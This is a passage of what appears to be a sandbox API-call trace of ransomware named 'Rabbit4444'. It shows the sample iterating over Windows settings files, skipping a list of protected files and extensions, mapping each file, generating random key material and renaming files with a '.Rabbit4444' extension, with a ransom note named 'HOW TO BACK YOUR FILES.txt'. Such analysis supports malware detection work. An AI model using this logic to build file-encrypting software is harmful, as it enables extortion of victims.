lstrlenW (lpString=".sys") returned 4 [0058.277] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.277] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{0f1b68f6-b72d-4229-bc9c-a87f0b16b17b}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.278] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.278] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14958850658) returned 1 [0058.278] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1206) returned 1 [0058.278] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0058.278] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0058.278] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c0, lpName=0x0) returned 0x298 [0058.279] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c0) returned 0x70000 [0058.280] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.280] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0058.280] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.280] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.280] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.280] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.280] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.280] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0058.280] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14959114809) returned 1 [0058.280] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0058.280] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0058.281] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.281] CloseHandle (hObject=0x298) returned 1 [0058.281] CloseHandle (hObject=0x278) returned 1 [0058.281] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms.Rabbit4444") returned 192 [0058.281] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{0f1b68f6-b72d-4229-bc9c-a87f0b16b17b}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{0f1b68f6-b72d-4229-bc9c-a87f0b16b17b}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.282] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x449c06b4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x449c06b4, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x22440e3c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms", cAlternateFileName="CL9D44~1.SET")) returned 1 [0058.282] lstrcmpiW (lpString1="Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.282] lstrcmpiW (lpString1="Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.282] lstrcmpiW (lpString1="Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.282] lstrcmpiW (lpString1="Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms", lpString2=".") returned 1 [0058.282] lstrcmpiW (lpString1="Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms", lpString2="..") returned 1 [0058.282] lstrcmpiW (lpString1="Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms", lpString2="windows") returned -1 [0058.282] lstrcmpiW (lpString1="Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.282] lstrcmpiW (lpString1="Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.282] lstrcmpiW (lpString1="Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms", lpString2="boot") returned 1 [0058.282] lstrcmpiW (lpString1="Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.282] lstrcmpiW (lpString1="Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.282] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms" | out: lpString1="Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms") returned="Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms" [0058.282] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.282] lstrlenW (lpString="Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms") returned 64 [0058.282] lstrlenW (lpString="Rabbit4444") returned 10 [0058.282] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.282] lstrlenW (lpString=".dll") returned 4 [0058.282] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.282] lstrlenW (lpString=".lnk") returned 4 [0058.282] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.283] lstrlenW (lpString=".ini") returned 4 [0058.283] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.283] lstrlenW (lpString=".sys") returned 4 [0058.283] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.283] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{1011988d-12f9-446b-85ff-a1579ccd1678}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.283] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.283] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14959382628) returned 1 [0058.283] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1011) returned 1 [0058.283] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0058.283] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0058.283] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x298 [0058.284] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x70000 [0058.285] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.285] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0058.285] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.285] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0058.285] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.285] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0058.285] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.285] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0058.285] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14959619963) returned 1 [0058.286] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0058.286] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0058.286] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.286] CloseHandle (hObject=0x298) returned 1 [0058.286] CloseHandle (hObject=0x278) returned 1 [0058.286] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms.Rabbit4444") returned 192 [0058.286] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{1011988d-12f9-446b-85ff-a1579ccd1678}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{1011988d-12f9-446b-85ff-a1579ccd1678}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.287] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44c6f174, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x44c6f174, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x224d97aa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x46b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms", cAlternateFileName="CL13E5~1.SET")) returned 1 [0058.287] lstrcmpiW (lpString1="Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.287] lstrcmpiW (lpString1="Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.287] lstrcmpiW (lpString1="Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.287] lstrcmpiW (lpString1="Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms", lpString2=".") returned 1 [0058.287] lstrcmpiW (lpString1="Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms", lpString2="..") returned 1 [0058.287] lstrcmpiW (lpString1="Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms", lpString2="windows") returned -1 [0058.287] lstrcmpiW (lpString1="Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.287] lstrcmpiW (lpString1="Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.287] lstrcmpiW (lpString1="Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms", lpString2="boot") returned 1 [0058.287] lstrcmpiW (lpString1="Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.287] lstrcmpiW (lpString1="Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.287] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms" | out: lpString1="Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms") returned="Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms" [0058.287] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.287] lstrlenW (lpString="Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms") returned 64 [0058.287] lstrlenW (lpString="Rabbit4444") returned 10 [0058.287] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.287] lstrlenW (lpString=".dll") returned 4 [0058.287] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.287] lstrlenW (lpString=".lnk") returned 4 [0058.287] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.288] lstrlenW (lpString=".ini") returned 4 [0058.288] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.288] lstrlenW (lpString=".sys") returned 4 [0058.288] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.288] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.288] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.288] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14959867527) returned 1 [0058.288] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1131) returned 1 [0058.288] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0058.288] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0058.288] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x770, lpName=0x0) returned 0x298 [0058.289] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x770) returned 0x70000 [0058.290] CryptAcquireContextW (in: phProv=0x130bbd0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x130bbd0*=0x101408) returned 1 [0058.290] CryptGenRandom (in: hProv=0x101408, dwLen=0x80, pbBuffer=0x130bbec | out: pbBuffer=0x130bbec) returned 1 [0058.291] CryptReleaseContext (hProv=0x101408, dwFlags=0x0) returned 1 [0058.291] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.291] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0058.291] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.291] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0058.291] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.291] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0058.291] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.291] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0058.291] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14960189073) returned 1 [0058.291] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0058.291] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0058.291] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.291] CloseHandle (hObject=0x298) returned 1 [0058.291] CloseHandle (hObject=0x278) returned 1 [0058.291] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms.Rabbit4444") returned 192 [0058.291] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.292] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44d07ae3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x44d07ae3, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x22204b03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x391, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms", cAlternateFileName="CLF96F~1.SET")) returned 1 [0058.292] lstrcmpiW (lpString1="Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.292] lstrcmpiW (lpString1="Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.292] lstrcmpiW (lpString1="Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.292] lstrcmpiW (lpString1="Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms", lpString2=".") returned 1 [0058.293] lstrcmpiW (lpString1="Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms", lpString2="..") returned 1 [0058.293] lstrcmpiW (lpString1="Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms", lpString2="windows") returned -1 [0058.293] lstrcmpiW (lpString1="Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.293] lstrcmpiW (lpString1="Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.293] lstrcmpiW (lpString1="Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms", lpString2="boot") returned 1 [0058.293] lstrcmpiW (lpString1="Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.293] lstrcmpiW (lpString1="Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.293] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms" | out: lpString1="Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms") returned="Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms" [0058.293] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.293] lstrlenW (lpString="Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms") returned 64 [0058.293] lstrlenW (lpString="Rabbit4444") returned 10 [0058.293] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.293] lstrlenW (lpString=".dll") returned 4 [0058.293] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.293] lstrlenW (lpString=".lnk") returned 4 [0058.293] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.293] lstrlenW (lpString=".ini") returned 4 [0058.293] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.293] lstrlenW (lpString=".sys") returned 4 [0058.293] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.293] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{11135ae0-7372-4f85-8d1b-93d6efbe5a99}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.294] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.294] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14960439493) returned 1 [0058.294] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=913) returned 1 [0058.294] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0058.294] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0058.294] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6a0, lpName=0x0) returned 0x298 [0058.380] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6a0) returned 0x70000 [0058.381] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.381] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0058.381] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.381] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0058.381] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.381] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0058.381] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.381] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0058.381] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14969207949) returned 1 [0058.381] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0058.381] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0058.381] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.382] CloseHandle (hObject=0x298) returned 1 [0058.382] CloseHandle (hObject=0x278) returned 1 [0058.382] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms.Rabbit4444") returned 192 [0058.382] MoveFileExW 